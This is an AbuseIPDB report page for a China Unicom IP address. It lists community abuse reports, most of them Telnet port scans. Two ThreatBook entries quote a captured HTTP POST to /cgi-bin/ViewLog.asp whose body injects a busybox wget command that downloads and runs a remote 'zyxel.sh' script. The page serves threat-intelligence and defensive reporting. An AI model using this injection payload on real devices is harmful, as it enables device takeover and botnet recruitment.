JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 220.201.139.156

220.201.139.156 was found in our database!

This IP was reported 67 times. Confidence of Abuse is 0%: ?

ISP	China Unicom
Usage Type	Fixed Line ISP
ASN	AS4837
Domain Name	chinaunicom.cn
Country	🇨🇳 China
City	Shenyang, Liaoning

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 220.201.139.156

Whois 220.201.139.156

IP Abuse Reports for 220.201.139.156:

This IP address has been reported a total of 67 times from 26 distinct sources. 220.201.139.156 was first reported on June 3rd 2023, and the most recent report was 6 months ago.

Old Reports: The most recent abuse report for this IP address is from 6 months ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇩🇪 ps-center	2025-11-30 18:06:06 (6 months ago)	C2-W: TCP-Scanner. Port: 23	Port Scan
Anonymous	2024-11-14 18:46:14 (1 year ago)	Unauthorized connection to Telnet port 23	Port Scan
🇨🇼 ATV	2023-06-11 01:42:12 (3 years ago)	Unsolicited connection attempts to port 23	Hacking
🇨🇳 ThreatBook.io	2023-06-11 00:53:26 (3 years ago)	ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/220.201.139.156 202 ... show more ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/220.201.139.156 2023-06-10 04:19:51 /cgi-bin/ViewLog.asp,{"body":" /bin/busybox wget http://IPHERE/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh","content_type":"application/x-www-form-urlencoded","header":{"Accept":["/"],"Accept-Encoding":["gzip, deflate"],"Connection":["keep-alive"],"Content-Length":["227"],"Content-Type":["application/x-www-form-urlencoded"],"User-Agent":["python-requests/2.20.0"]},"host":"192.168.0.14:80","method":"POST","proto":"HTTP/1.1","remote_addr":"220.201.139.156:34029","status_code":200,"url":"/cgi-bin/ViewLog.asp","user_agent":"python-requests/2.20.0"} show less	Web App Attack
🇺🇸 RAP	2023-06-10 14:35:47 (3 years ago)	2023-06-10 14:35:47 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇺🇸 stvnrdg.me	2023-06-10 09:43:57 (3 years ago)	Jun 10 09:43:57 oracle-1 kernel: [615239.752966] honeypot: IN=ens3 OUT= MAC=02:00:17:06:00:99:00:00: ... show more Jun 10 09:43:57 oracle-1 kernel: [615239.752966] honeypot: IN=ens3 OUT= MAC=02:00:17:06:00:99:00:00:17:24:11:0a:08:00 SRC=220.201.139.156 DST=10.0.0.6 LEN=40 TOS=0x00 PREC=0x00 TTL=54 ID=59949 PROTO=TCP SPT=65309 DPT=23 WINDOW=13773 RES=0x00 SYN URGP=0 ... show less	Bad Web Bot Web App Attack
🇺🇸 RAP	2023-06-10 08:46:36 (3 years ago)	2023-06-10 08:46:36 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
Anonymous	2023-06-10 07:55:03 (3 years ago)	The IP has been banned due to the violation / illegal of the use. Filter: nginx-webattack	Hacking Web App Attack
🇺🇸 RAP	2023-06-10 05:47:17 (3 years ago)	2023-06-10 05:47:17 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇪🇸 networknoise.xyz	2023-06-10 04:24:31 (3 years ago)	PORT : 8080 \| https://networknoise.xyz/?filter=IP:Hx9oY39aVxdWRQ1gQm9w	Port Scan
🇨🇳 ThreatBook.io	2023-06-10 00:43:26 (3 years ago)	ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/220.201.139.156 202 ... show more ThreatBook Intelligence: Zombie,Scanner more details on https://threatbook.io/ip/220.201.139.156 2023-06-09 03:36:52 /cgi-bin/ViewLog.asp,{"body":" /bin/busybox wget http://IPHERE/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh","content_type":"application/x-www-form-urlencoded","header":{"Accept":["/"],"Accept-Encoding":["gzip, deflate"],"Connection":["keep-alive"],"Content-Length":["227"],"Content-Type":["application/x-www-form-urlencoded"],"User-Agent":["python-requests/2.20.0"]},"host":"192.168.0.14:80","method":"POST","proto":"HTTP/1.1","remote_addr":"220.201.139.156:53482","status_code":200,"url":"/cgi-bin/ViewLog.asp","user_agent":"python-requests/2.20.0"} show less	SSH
🇺🇸 RAP	2023-06-09 22:04:14 (3 years ago)	2023-06-09 22:04:14 UTC Unauthorized activity to TCP port 23. Telnet	Port Scan
🇺🇸 MPL	2023-06-09 18:36:16 (3 years ago)	tcp/23	Port Scan
🇺🇸 MPL	2023-06-09 08:40:14 (3 years ago)	tcp/23 (2 or more attempts)	Port Scan
🇺🇸 RAP	2023-06-09 05:21:37 (3 years ago)	2023-06-09 05:21:37 UTC Unauthorized activity to TCP port 2323. Telnet	Port Scan

Showing 1 to 15 of 67 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇰🇷 221.162.175.253

🇰🇷 221.162.60.216

🇰🇷 210.95.176.243

🇳🇱 195.178.110.30

🇮🇳 171.61.19.165

🇺🇸 109.105.209.12

🇮🇷 85.198.19.251

🇨🇳 220.197.44.221

🇩🇪 212.30.36.171

🇺🇸 209.126.25.49

🇺🇸 207.244.243.217

🇺🇦 194.62.136.207

🇬🇧 159.253.63.187

🇫🇷 91.231.89.165

🇳🇱 45.144.212.40

🇳🇱 45.140.222.124

🇺🇸 34.138.198.0

🇧🇪 34.38.241.87

🇧🇷 201.15.149.254

🇳🇱 185.223.235.58